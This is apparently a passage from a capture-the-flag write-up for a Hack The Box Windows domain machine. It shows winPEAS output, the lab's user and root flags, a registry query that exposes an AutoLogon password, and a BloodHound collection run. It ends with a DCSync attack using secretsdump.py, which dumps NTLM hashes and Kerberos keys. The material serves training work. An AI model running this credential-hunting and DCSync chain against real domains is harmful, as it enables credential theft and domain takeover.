È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault
[ERROR] Unable to enumerate vaults. Error (0x1061)
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Checking Credential manager
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault
[!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string
[!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'
Please run:
cmdkey /list
ÉÍÍÍÍÍÍÍÍÍ͹ Saved RDP connections
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Remote Desktop Server/Client Settings
RDP Server Settings
Network Level Authentication :
Block Clipboard Redirection :
Block COM Port Redirection :
Block Drive Redirection :
Block LPT Port Redirection :
Block PnP Device Redirection :
Block Printer Redirection :
Allow Smart Card Redirection :
RDP Client Settings
Disable Password Saving : True
Restricted Remote Administration : False
ÉÍÍÍÍÍÍÍÍÍ͹ Recently run commands
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Checking for DPAPI Master Keys
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
MasterKey: C:\Users\FSmith\AppData\Roaming\Microsoft\Protect\S-1-5-21-2966785786-3096785034-1186376766-1105\ca6bc5b5-57d3-4f19-9f5a-3016d1e57c8f
Accessed: 1/24/2020 6:30:19 AM
Modified: 1/24/2020 6:30:19 AM
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Checking for DPAPI Credential Files
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Checking for RDCMan Settings Files
È Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Kerberos tickets
È https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
[X] Exception: Object reference not set to an instance of an object.
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for saved Wifi credentials
[X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not be found. (Exception from HRESULT: 0x8007007E)
Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'
No saved Wifi credentials found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking AppCmd.exe
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe
You must be an administrator to run this check
ÉÍÍÍÍÍÍÍÍÍ͹ Looking SSClient.exe
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#scclient-sccm
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating SSCM - System Center Configuration Manager settings
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Security Packages Credentials
[X] Exception: Couldn't parse nt_resp. Len: 0 Message bytes: 4e544c4d535350000300000001000100620000000000000063000000000000005800000000000000580000000a000a00580000000000000063000000058a80a20a0063450000000f7b63fb8f98fe77a8ef593c7dbf13cfad5300410055004e00410000
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Browsers Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Firefox
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Firefox DBs
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in Firefox history
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Chrome
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Chrome DBs
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in Chrome history
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Chrome bookmarks
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Opera
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Brave Browser
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Showing saved credentials for Internet Explorer (unsupported)
Info: if no credentials were listed, you might need to close the browser and try again.
ÉÍÍÍÍÍÍÍÍÍ͹ Current IE tabs
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
[X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: The server process could not be started because the configured identity is incorrect. Check the username and password. (Exception from HRESULT: 0x8000401A)
--- End of inner exception stack trace ---
at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)
at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)
at winPEAS.KnownFileCreds.Browsers.InternetExplorer.GetCurrentIETabs()
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for GET credentials in IE history
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history
ÉÍÍÍÍÍÍÍÍÍ͹ IE history -- limit 50
http://go.microsoft.com/fwlink/p/?LinkId=255141
ÉÍÍÍÍÍÍÍÍÍ͹ IE favorites
Not Found
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Interesting files and registry ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Putty Sessions
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Putty SSH Host keys
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ SSH keys in registry
È If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#ssh-keys-in-registry
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ SuperPutty configuration files
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Office 365 endpoints synced by OneDrive.
SID: S-1-5-19
=================================================================================================
SID: S-1-5-20
=================================================================================================
SID: S-1-5-21-2966785786-3096785034-1186376766-1105
=================================================================================================
SID: S-1-5-18
=================================================================================================
ÉÍÍÍÍÍÍÍÍÍ͹ Cloud Credentials
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Unattend Files
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for common SAM & SYSTEM backups
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for McAfee Sitelist.xml Files
ÉÍÍÍÍÍÍÍÍÍ͹ Cached GPP Passwords
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for possible regs with creds
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry
Not Found
Not Found
Not Found
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for possible password files in users homes
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
ÉÍÍÍÍÍÍÍÍÍ͹ Searching for Oracle SQL Developer config files
ÉÍÍÍÍÍÍÍÍÍ͹ Slack files & directories
note: check manually if something is found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for LOL Binaries and Scripts (can be slow)
È https://lolbas-project.github.io/
[!] Check skipped, if you want to run it, please specify '-lolbas' argument
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Outlook download files
ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating machine and user certificate files
ÉÍÍÍÍÍÍÍÍÍ͹ Searching known files that can contain creds in home
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for documents --limit 100--
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Office Most Recent Files -- limit 50
Last Access Date User Application Document
ÉÍÍÍÍÍÍÍÍÍ͹ Recent files --limit 70--
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Looking inside the Recycle Bin for creds files
È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Not Found
ÉÍÍÍÍÍÍÍÍÍ͹ Searching hidden files or folders in C:\Users home (can be slow)
C:\Users\Default
C:\Users\All Users
C:\Users\All Users\ntuser.pol
C:\Users\All Users\RICOH_DRV\RICOH Aficio SP 8300DN PCL 6\utne7z\FileCache_DrvDeviceCapabilites
C:\Users\All Users\RICOH_DRV\RICOH Aficio SP 8300DN PCL 6\_common
C:\Users\All Users\RICOH_DRV\RICOH Aficio SP 8300DN PCL 6
C:\Users\All Users\RICOH_DRV\RICOH Aficio SP 8300DN PCL 6\do_not_delete_folders
C:\Users\Default User
C:\Users\Default
C:\Users\All Users
ÉÍÍÍÍÍÍÍÍÍ͹ Searching interesting files in other users home directories (can be slow)
[X] Exception: Object reference not set to an instance of an object.
ÉÍÍÍÍÍÍÍÍÍ͹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions "C:\Users\FSmith\Documents\w.exe": FSmith [AllAccess]
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Linux shells/distributions - wsl.exe, bash.exe
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ File Analysis ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÉÍÍÍÍÍÍÍÍÍ͹ Found Windows Files
File: C:\Users\All Users\USOShared\Logs\System
File: C:\Program Files\Common Files\system
File: C:\Program Files (x86)\Common Files\system
File: C:\Users\All Users\RICOH_DRV\RICOH Aficio SP 8300DN PCL 6\_common\wording\Aficio SP 8300DN\index.dat
File: C:\Users\Default\NTUSER.DAT
File: C:\Users\FSmith\NTUSER.DAT
ÉÍÍÍÍÍÍÍÍÍ͹ Found Other Windows Files
File: C:\Users\All Users\USOShared\Logs\System
File: C:\Program Files\Common Files\system
File: C:\Program Files (x86)\Common Files\system
ÉÍÍÍÍÍÍÍÍÍ͹ Found Database Files
File: C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db
File: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db
File: C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db
ÉÍÍÍÍÍÍÍÍÍ͹ Found Backups Files
File: C:\Users\All Users\VMware\VMware VGAuth\backup
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-SumoLogic Access ID Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml: ynchronization
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml: ynchronization
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Confluent Access Token & Secret Key Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml: incomingdelegate
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml: incomingresponse
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml: incomingteamcall
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Etsy Access Token Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml: incomingresponsegroupcal
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Mattermost Access Token Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml: oegankelijkheidsinstelling
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Plaid Client ID Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml: incomingresponsegroupcal
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Plaid Secret key Regexes
C:\Users\FSmith\Desktop\user.txt: 1ec3cda913d4b188e4b59cf3d43b1b
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Travis CI Access Token Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml: incomingresponsegroupc
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Authorization Basic Regexes
C:\inetpub\wwwroot\w3layouts-license.txt: basic Mobiles
C:\inetpub\wwwroot\w3layouts-license.txt: basic mobile
C:\inetpub\wwwroot\w3layouts-license.txt: basic mobile
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Adafruit API Key Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Base32 Regexes
C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.1911.3-0\ThirdPartyNotices.txt: SOFTWARE
C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.1911.3-0\ThirdPartyNotices.txt: PROVIDED
C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.1911.3-0\ThirdPartyNotices.txt: INCLUDIN
C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.1911.3-0\ThirdPartyNotices.txt: LIABILIT
C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.1911.3-0\ThirdPartyNotices.txt: SOFTWARE
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Nytimes Access Token Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Kucoin Secret Key Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b30ee
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b30ee
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-MojoAuth API Key Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b30ee
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b30ee
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Sendbird Access ID Regexes
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b30ee
C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml: 59031a47-3f72-44a7-89c5-5595fe6b30ee
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Gitter Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Launchdarkly Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Netlify Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527141167
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667621335
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Okta Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 881983098579336348622705268271807846252714
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 111599284431783897149652717794162909166762
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-RapidAPI Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 88198309857933634862270526827180784625271411676638
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 11159928443178389714965271779416290916676213355865
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Bittrex Access Key and Access Key Regexes
C:\Users\FSmith\Desktop\user.txt: 1ec3cda913d4b188e4b59cf3d43b1b78
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Coinbase Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527141167663861554190069477
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667621335586597164552246905
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Droneci Access Token Regexes
C:\Users\FSmith\Desktop\user.txt: 1ec3cda913d4b188e4b59cf3d43b1b78
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Flickr Access Token Regexes
C:\Users\FSmith\Desktop\user.txt: 1ec3cda913d4b188e4b59cf3d43b1b78
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Freshbooks Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527141167663861554190069477
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667621335586597164552246905
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Hubspot API Key Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\KeyHolder\61afd6a2-d7c3-8d25-36c2-0c2c47e3aca8.xml: "6b594c27-b3ee-45ff-812e-686be66532ce"
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Kucoin Access Token Regexes
C:\Users\FSmith\Desktop\user.txt: 1ec3cda913d4b188e4b59cf3
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-ORB Intelligence Access Key Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\KeyHolder\61afd6a2-d7c3-8d25-36c2-0c2c47e3aca8.xml: "6b594c27-b3ee-45ff-812e-686be66532ce"
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Sendbird Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Sentry Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527141167663861554190069477
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667621335586597164552246905
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-SumoLogic Access Token Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527141167663861554190069477
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667621335586597164552246905
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-URLScan API Key Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\KeyHolder\61afd6a2-d7c3-8d25-36c2-0c2c47e3aca8.xml: "6b594c27-b3ee-45ff-812e-686be66532ce"
ÉÍÍÍÍÍÍÍÍÍ͹ Found APIs-Zendesk Secret Key Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 8819830985793363486227052682718078462527
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 1115992844317838971496527177941629091667
ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-Emails Regexes
C:\inetpub\wwwroot\single.html: example@email.com
C:\inetpub\wwwroot\single.html: info@example.com
ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-Config Secrets Regexes
C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1: $env:
ÉÍÍÍÍÍÍÍÍÍ͹ Found Misc-IPs Regexes
C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c378ac18-cc10-d9e3-1cf0-c2423682c497.xml: 045.3.1.7
ÉÍÍÍÍÍÍÍÍÍ͹ Found Raw Hashes-md5 Regexes
C:\Users\FSmith\Desktop\user.txt: 1ec3cda913d4b188e4b59cf3d43b1b78
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
Flags
user :
1ec3cda913d4b188e4b59cf3d43b1b78
root :
8ec5ad4dc6f0db90d9079345f9b35403updating user list
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
Password Hunting
##Manual Find
*Evil-WinRM* PS C:\Users\FSmith\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x156458a35
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey
## Winpeas result
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!svc_loanmanager : Moneymakestheworldgoround!
bloodhound-python -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c all
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 08SIn Active Directory (AD), the GetChanges and GetChangesAll operations are part of the replication process. They are not inherently malicious; instead, they are legitimate operations used by domain controllers to replicate changes between each other. However, in the context of security, these operations can be exploited in a technique called DCSync.
DCSync is an attack technique that takes advantage of the replication mechanisms in Active Directory. It allows an attacker to simulate the behavior of a domain controller (DC) and request password data for user accounts, including those with privileged access like domain administrators. The attacker does not need to compromise the account's password but instead requests and replicates the password hash.
Here's how DCSync works:
Replication Request: An attacker with sufficient privileges (often a domain administrator or a user with the "Replicating Directory Changes" permission) uses the
GetChangesorGetChangesAlloperation to request changes from the Active Directory, simulating replication requests.Password Hash Retrieval: If the attacker requests changes related to user account password hashes, the DC will provide the information, including the NTLM hashes.
Pass-the-Ticket or Pass-the-Hash: The attacker can then use the obtained password hashes for lateral movement within the network or privilege escalation.
POC :
secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:3b79e0b18870c9f654988e1f7e2584ad:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
